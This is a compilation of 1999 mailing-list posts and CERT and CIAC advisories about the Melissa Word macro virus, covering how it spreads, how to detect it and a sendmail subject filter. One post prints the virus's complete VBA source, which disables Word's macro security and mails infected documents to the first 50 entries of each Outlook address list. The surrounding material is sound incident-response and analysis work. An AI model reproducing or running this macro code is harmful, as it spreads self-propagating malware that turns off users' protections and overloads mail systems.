Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consist of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected documents contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this.  I placed the code up on my site,
formatted so that it is readable.

   http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
    DasMapiName.Logoff
  End If
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
  Set ToInfect = ADI1
  ADI1.Name = "Melissa"
  DoAD = True
End If

If NTI1.Name <> "Melissa" Then
  If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
  Set ToInfect = NTI1
  NTI1.Name = "Melissa"
  DoNT = True
End If
    
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
  Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If
  
If DoAD = True Then
  Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True 
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 17:51:49 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Here is my analysis of how the virus works.  The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot

1.  Check for Word security controls and disable them:
    Word 2000
        Macro.Security... = FALSE
    Word 97
        Options.ConfirmConversions = 0
        Options.VirusProtection = 0
        Options.SaveNormalPrompt = 0

2.  See if machine is already infected
    Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
Kwyjibo"

3.  If it wasn't already infected, go through the Outlook addressbook and
send mail to the first 50 names
    Subject: Important Message From <Full Name>
    Body:  Here is that document you asked for... don't show anyone else
;-)
    Attachment:  itself, named "list.doc"

    After sending the mail, add the registry key to disable further
infection.

4.  Open the Active Document and Normal.dot and infect them with itself

5.  On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters.  Game's over.  I'm outta here."

It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment.  It
appears the virus vendors have a patch out now.  To avoid infection,
disable macros when opening any Word document or just don't open the
attachment.  Thanks to Josh Siegel for sending me the code.

-Nate

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:00:35 -0800
From: "Kuo, Jimmy" <Jimmy_Kuo@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Nate Lawson does a wonderful writeup to which I will make minor
clarifications:
>Here is my analysis of how the virus works.  The McAfee article aleph1
>posted neglects to mention that it infects the active document and
>Normal.dot

[Hide face]
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means.  And that if you don't have
Outlook, breath calm.  But if you do have Outlook, WATCH OUT!

"infects the active document" is redundant.  It's infected.  That's what
starts this.

>1.  Check for Word security controls and disable them:
>    Word 2000
>        Macro.Security... = FALSE
>    Word 97
>        Options.ConfirmConversions = 0
>        Options.VirusProtection = 0
>        Options.SaveNormalPrompt = 0

>2.  See if machine is already infected
>    Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
>Kwyjibo"

>3.  If it wasn't already infected, go through the Outlook addressbook and
>send mail to the first 50 names

First 50 names of every addressbook.

And the kicker?  Look at the first 50 names in your address books?  How many
mailing lists are there?

>    Subject: Important Message From <Full Name>
>    Body:  Here is that document you asked for... don't show anyone else
>;-)

>    Attachment:  itself, named "list.doc"

This time.  We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.

>    After sending the mail, add the registry key to disable further
>infection.

Disables future mailings.  Infections can happen again.  But the email blast
will happen only the first time, unless you clean the registry.  So we
recommend that you do not remove that element of the registry.

>4.  Open the Active Document and Normal.dot and infect them with itself

>5.  On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters.  Game's over.  I'm outta here."

>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment.  It
>appears the virus vendors have a patch out now.  To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment.  Thanks to Josh Siegel for sending me the code.

Good ideas.

Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
jkuo@nai.com

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:24:47 -0800
From: Aaron Wood <awood@CS.WASHINGTON.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)


On a lighter side...


MSNBC speculates as to the origin of the Hackers name.

       "Kwyjibo appears to be a reference to a "Simpsons" TV show episode in
which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo.
The virus also includes a line from that episode: "Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."


AW


-----Original Message-----
>From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)


This is a serious event.  A number of major companies - including Microsoft
and Intel have told the press that they had to temporarily shut down their
e-mail systems due to this virus.  At least 25 major companies have
contacted Trend Micro about this today alone.

Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents.  The tool, called
HouseCall for Microsoft Exchange is available at:

http://housecall.antivirus.com/smex_housecall/
<http://housecall.antivirus.com/smex_housecall/>

This detects, but does not cure infected files.  HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it.  Considering this audience, I suspect you will want
to remember to set those settings back when you are done.

Trend also offers a tool for scanning individual machines
http://housecall.antivirus.com
<http://housecall.antivirus.com/smex_housecall/>

Virus Description:

This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ".
. . by Kwyjibo." This is how the virus determines whether it has activated
on this system.

The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.

If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to ".
. . by Kwijibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."

Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 07:07:20 -0500
From: CERT Advisory <cert-advisory@cert.org>
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.04 - Melissa Macro Virus

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-99-04-Melissa-Macro-Virus

   Original issue date: Saturday March 27 1999
   Last Revised: Saturday March 27, 1999

Systems Affected

     * Machines with Microsoft Word 97 or Word 2000
     * Any mail handling system could experience performance problems or
       a denial of service as a result of the propagation of this macro
       virus.

Overview

   At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began
   receiving reports of a Microsoft Word 97 and Word 2000 macro virus
   which is propagating via email attachments. The number and variety of
   reports we have received indicate that this is a widespread attack
   affecting a variety of sites.

   Our analysis of this macro virus indicates that human action (in the
   form of a user opening an infected Word document) is required for this
   virus to propagate. It is possible that under some mailer
   configurations, a user might automatically open an infected document
   received in the form of an email attachment. This macro virus is not
   known to exploit any new vulnerabilities. While the primary transport
   mechanism of this virus is via email, any way of transferring files
   can also propagate the virus.

   Anti-virus software vendors have called this macro virus the Melissa
   macro or W97M_Melissa virus.

I. Description

   The Melissa macro virus propagates in the form of an email message
   containing an infected Word document as an attachment. The transport
   message has most frequently been reported to contain the following
   Subject header

      Subject: Important Message From <name>

   Where <name> is the full name of the user sending the message.

   The body of the message is a multipart MIME message containing two
   sections. The first section of the message (Content-Type: text/plain)
   contains the following text.

      Here is that document you asked for ... don't show anyone else ;-)

   The next section (Content-Type: application/msword) was initially
   reported to be a document called "list.doc". This document contains
   references to pornographic web sites. As this macro virus spreads we
   are likely to see documents with other names. In fact, under certain
   conditions the virus may generate attachments with documents created
   by the victim.

   When a user opens an infected .doc file with Microsoft Word97 or
   Word2000, the macro virus is immediately executed if macros are
   enabled.

   Upon execution, the virus first lowers the macro security settings to
   permit all macros to run when documents are opened in the future.
   Therefore, the user will not be notified when the virus is executed in
   the future.

   The macro then checks to see if the registry key

   "HKEY_Current_User\Software\Microsoft\Office\Melissa?"

   has a value of "... by Kwyjibo". If that registry key does not exist
   or does not have a value of "... by Kwyjibo", the virus proceeds to
   propagate itself by sending an email message in the format described
   above to the first 50 entries in every MAPI address book readable by
   the user executing the macro. Keep in mind that if any of these email
   addresses are mailing lists, the message will be delivered to everyone
   on the mailing lists. In order to successfully propagate, the affected
   machine must have Microsoft Outlook installed; however, Outlook does
   not need to be the mailer used to read the message.

   Next, the macro virus sets the value of the registry key to "... by
   Kwyjibo". Setting this registry key causes the virus to only propagate
   once per session. If the registry key does not persist through
   sessions, the virus will propagate as described above once per every
   session when a user opens an infected document. If the registry key
   persists through sessions, the virus will no longer attempt to
   propagate even if the affected user opens an infected document.

   The macro then infects the Normal.dot template file. By default, all
   Word documents utilize the Normal.dot template; thus, any newly
   created Word document will be infected. Because unpatched versions of
   Word97 may trust macros in templates the virus may execute without
   warning. For more information please see:

       http://www.microsoft.com/security/bulletins/ms99-002.asp

   Finally, if the minute of the hour matches the day of the month at
   this point, the macro inserts into the current document the message
   "Twenty-two points, plus triple-word-score, plus fifty points for
   using all my letters. Game's over. I'm outta here."

   Note that if you open an infected document with macros disabled and
   look at the list of macros in this document, neither Word97 nor
   Word2000 list the macro. The code is actually VBA (Visual Basic for
   Applications) code associated with the "document.open" method. You can
   see the code by going into the Visual Basic editor.

   If you receive one of these messages, keep in mind that the message
   came from someone who is affected by this virus and they are not
   necessarily targeting you. We encourage you to contact any users from
   which you have received such a message. Also, we are interested in
   understanding the scope of this activity; therefore, we would
   appreciate if you would report any instance of this activity to us
   according to our Incident Reporting Guidelines document available at:

       http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

     * Users who open an infected document in Word97 or Word2000 with
       macros enabled will infect the Normal.dot template causing any
       documents referencing this template to be infected with this macro
       virus. If the infected document is opened by another user, the
       document, including the macro virus, will propagate. Note that
       this could cause the user's document to be propagated instead of
       the original document, and thereby leak sensitive information.

     * Indirectly, this virus could cause a denial of service on mail
       servers. Many large sites have reported performance problems with
       their mail servers as a result of the propagation of this virus.

III. Solutions

     * Block messages with the signature of this virus at your mail transfer
       agents.

       With Sendmail

       Nick Christenson of sendmail.com provided information about
       configuring sendmail to filter out messages that may contain the
       Melissa virus. This information is available from the follow URL:
       ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m
       elissa-filter.txt

     * Utilize virus scanners

       Most virus scanning tools will detect and clean macro viruses. In
       order to detect and clean current viruses you must keep your
       scanning tools up to date with the latest definition files.

          + McAfee / Network Associates

            http://vil.mcafee.com/vil/vm10120.asp
            http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

          + Symantec

            http://www.symantec.com/avcenter/venc/data/mailissa.html

          + Trend Micro

            http://housecall.antivirus.com/smex_housecall/technotes.html

     * Encourage users at your site to disable macros in Microsoft Word

       Notify all of your users of the problem and encourage them to
       disable macros in Word. You may also wish to encourage users to
       disable macros in any product that contains a macro language as
       this sort of problem is not limited to Microsoft Word.

       In Word97 you can disable automatic macro execution (click
       Tools/Options/General then turn on the 'Macro virus protection'
       checkbox). In Word2000 macro execution is controlled by a security
       level variable similar to Internet Explorer (click on
       Tools/Macro/Security and choose High, Medium, or Low). In that
       case, 'High' silently ignores the VBA code, Medium prompts in the
       way Word97 does to let you enable or disable the VBA code, and
       'Low' just runs it.

       Word2000 supports Authenticode on the VB code. In the 'High'
       setting you can specify sites that you trust and code from those
       sites will run.

     * General protection from Word Macro Viruses

       For information about macro viruses in general, we encourage you
       to review the document "Free Macro AntiVirus Techniques" by Chengi
       Jimmy Kuo which is available at.

          http://www.nai.com/services/support/vr/free.asp

Acknowledgements

   We would like to thank Jimmy Kuo of Network Associates, Eric Allman
   and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and
   Jason Garms and Karan Khanna of Microsoft for providing information
   used in this advisory.

   Additionally we would like to thank the many sites who reported this
   activity.
   ______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
   ______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
   If you prefer to use DES, please call the CERT hotline for more
   information.

Getting security information

   CERT publications and other security information are available from
   our web site http://www.cert.org/.

   To be added to our mailing list for advisories and bulletins, send
   email to cert-advisory-request@cert.org and include SUBSCRIBE
   your-email-address in the subject of your message.

   Copyright 1999 Carnegie Mellon University.
   Conditions for use, disclaimers, and sponsorship information can be
   found in http://www.cert.org/legal_stuff.html.

   * "CERT" and "CERT Coordination Center" are registered in the U.S.
   Patent and Trademark Office
   ______________________________________________________________________

   NO WARRANTY
   Any material furnished by Carnegie Mellon University and the Software
   Engineering Institute is furnished on an "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied as to any matter including, but not limited to, warranty of
   fitness for a particular purpose or merchantability, exclusivity or
   results obtained from use of the material. Carnegie Mellon University
   does not make any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
   ______________________________________________________________________

Revision History

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 20:20:13 -0800
From: Jim Reavis <jreavis@SECURITYPORTAL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.

I will shortly have my analysis up at http://securityportal.com/

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus

[  For Public Release  ]
-----BEGIN PGP SIGNED MESSAGE-----


             __________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
             __________________________________________________________

                             INFORMATION BULLETIN

                         W97M.Melissa Word Macro Virus

March 27, 1999 17:00 GMT                                        Number J-037
_____________________________________________________________________________
PROBLEM:       A new Word 97 macro virus named W97M.Malissa has been detected 
               at multiple DOE sites and is known to be spreading widely. The 
               virus uses Microsoft Outlook to e-mail the infected document 
               to the first 50 people from each of your Outlook address books.
PLATFORM:      Windows 95 or Windows NT running Microsoft Word 97 (version 8) 
               or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the 
               Macintosh is probably not vulnerable because the virus uses
               the Windows registry, but that has not been verified yet.  
               Outlook Express and other mail readers are not vulnerable. 
DAMAGE:        It overwrites the first macro in open documents and in the 
               normal.dot template with the macro virus code. It turns off 
               macro detection in Word. It sends copies of the infected 
               document to up to 50 people from each of your Outlook address 
               books. 
SOLUTION:      Use an updated antivirus product. Some vendors have a solution 
               available but in many cases you must go to the vendors web
               site to get it. Do not depend on the automatic or live update 
               feature of an antivirus package to get the detector for this 
               virus. Additional precautions are to password protect the 
               normal.dot file, turn on macro virus detection in Word, and DO 
               NOT OPEN attachments to mail messages with the subject 
               "Important Message From " and the contents "Here is that 
               document you asked for ... don't show anyone else ;-)" without 
               checking with the sender. Alert your computer security
               officers  if you receive such messages.
_____________________________________________________________________________
VULNERABILITY  Risk of infection is high. This virus is spreading widely 
ASSESSMENT:    within and without of the DOE complex. The risk of damage to 
               your system is low because most users do not have macros in  
               files and would be alerted by Word's macro detector. The risk  
               of lostproductivity and lost mail messages is high as mail  
               servers may have to be shut down and purged of infected mail 
               messages. 
_____________________________________________________________________________
   CIAC has critical information about the W97M.Melissa Word Macro Virus

The W97M.Malissa Word macro virus has been seen within the DOE complex. This 
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of  
Microsoft Word. When an infected document is opened, the virus checks to  
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar.   
It then disables the following Word options:

  Confirm conversions at open.
  Macro virus protection.
  Prompt to save Normal template.

Disabling these options makes it difficult to detect the virus in action. The 
virus next checks the value of the private registry string:

  HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? 

If that string is not equal to "... by Kwyjibo" the virus sends copies of the 
infected document to the first 50 people in each of your Outlook address 
books and then sets the registry key so it does not do this again. It sends 
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:

  Important Message From <username>

where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text: 

  Here is that document you asked for ... don't show anyone else ;-)

The virus then inserts the first 50 users from your Outlook address book, 
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.

After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If  
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is  
running on the Normal.dot template, it infects the active document with a 
Document_Open macro that runs whenever a document is opened. After the 
Normal.dot template is infected, the virus infects every document you work 
on as soon as you close them. If you share these documents with anyone, you 
will spread the virus.

Finally, if the minute of the hour equals the day of the month, the virus 
inserts the following message at the current location in the active document.

  Twenty-two points, plus triple-word-score, plus fifty points for using 
  all my letters.  Game's over.  I'm outta here.

Detecting The Virus
===================

Several antivirus vendors have a detection and cleaning capability for this 
virus; however, you must go to the vendors web site to get the scanner 
updates. Scanners with automatic or live update features do not yet get the  
update required to find and clean this virus. While we expect the detection  
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the 
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
does detect the virus, the current live update does not. We have reliable 
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and 
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)  
also have detection capabilities.

If you receive an e-mail with the following subject and body, DO NOT OPEN the 
attachment. 

Subject: 
  Important Message From <username>
Body: 
  Here is that document you asked for ... don't show anyone else ;-)

Make sure the sender is someone you know and then ask them if they really 
sent you the attachment before opening it. If they did not send it, do not 
open the attachment and contact your computer security manager. The most 
common name for the attached file is list1.doc but that name can change.

If the following text appears in a document without your putting it there, 
your normal.dot template is infected and your Word program is infecting all 
documents when you close them.

  Twenty-two points, plus triple-word-score, plus fifty points for using 
  all my letters.  Game's over.  I'm outta here.


Another option to see if a system has been infected is to use Regedit and 
search for the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that key exists and has the value "... by Kwyjibo" the system has been 
infected at some time. Note that the infection may have been removed without 
deleting the key. This key can be deleted, but does no damage if left alone.

Protecting A System
===================

The first step in protecting a system is to have a current antivirus package 
running on your system. Be sure to update it at least once a month. Many of
the newer antivirus scanners have the capability to automatically update
themselves every couple of weeks. 

To protect Word from this and other Word macro viruses, first insure that Word
has been patched with the Word 97 Template vulnerability patch 
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the 
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled. 

  Confirm conversions at open.
  Macro virus protection.
  Prompt to save Normal template.

Password Protecting The Normal.dot File
- - - - - ---------------------------------------

To password protect the Normal.dot file in Word 97, perform these steps:

1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice. 
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.

The next time you start Word, the normal.dot template will be protected. 

WARNING: If you ever have to type in the password to make changes to the 
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it. 

Turning On Macro Virus Protection and Other Options
- ---------------------------------------------------

Some simple macro virus protection is built into Word 97. It does not detect 
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not 
necessarily a virus. However, if you are alerted to a macro attached to a 
document you should be extremely wary because most people do not have macros
attached to their documents. 

Other options to set are: 

  Confirm conversions at open. This makes Word display a dialog box if 
    it is converting a document from one format to another.

  Prompt to save Normal template. This makes Word display a dialog box 
    asking you to confirm changes to the Normal.dot template. Most 
    macro viruses hide in Normal.dot so this lets you know that there 
    has been a change that you may want to prevent. Changes also occur 
    when you change the default font or one of the built-in styles.


To turn on macro virus protection and these other options, perform these
steps:

1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
4. Close the dialog box.

Whenever you open a document that contains macros, the macro virus protection 
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open 
the document without the macros, or cancel the open operation. You should  
only open a document with macros enabled if you are expecting there to be 
macros on that document and you know what they are supposed to do.

Detecting the Virus With a Mail Server
======================================

If a site has been infected you may need to block the virus infected mail 
messages with your mail servers. The following filter was written by Scott 
Hutton (Lead Security Engineer, Information Technology Security Office) of 
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block 
messages that do not contain the virus. Use this filter at your own 
discretion. 

===== start included text ======
We blocked this on our mail relays through the following additions to
the sendmail.cf:

  HSubject: $>CheckSubject
  SCheckSubject
  RImportant Message From $+    $#error $: 553 Subject Error
  R$*                           $@ OK

Don't forget that there are tabs before $#error and $@ OK.  This will
block any message where the subject begins with "Important Message
>From ...", which may be too rash of an action at your site.

===== end included text ======

Another filter was obtained by the CERT team from Nick Christenson of 
sendmail.com

ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-
filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail 
filter. Thanks to CERT and Nick Christenson of sendmail.com for another 
sendmail filter.
_____________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

   World Wide Web:      http://www.ciac.org/
                        (or http://ciac.llnl.gov -- they're the same machine)
   Anonymous FTP:       ftp.ciac.org
                        (or ciac.llnl.gov -- they're the same machine)
   Modem access:        +1 (925) 423-4753 (28.8K baud)
                        +1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
   information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
   (SPI) software updates, new features, distribution and
   availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
   use of SPI products.

Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:

E-mail to       ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
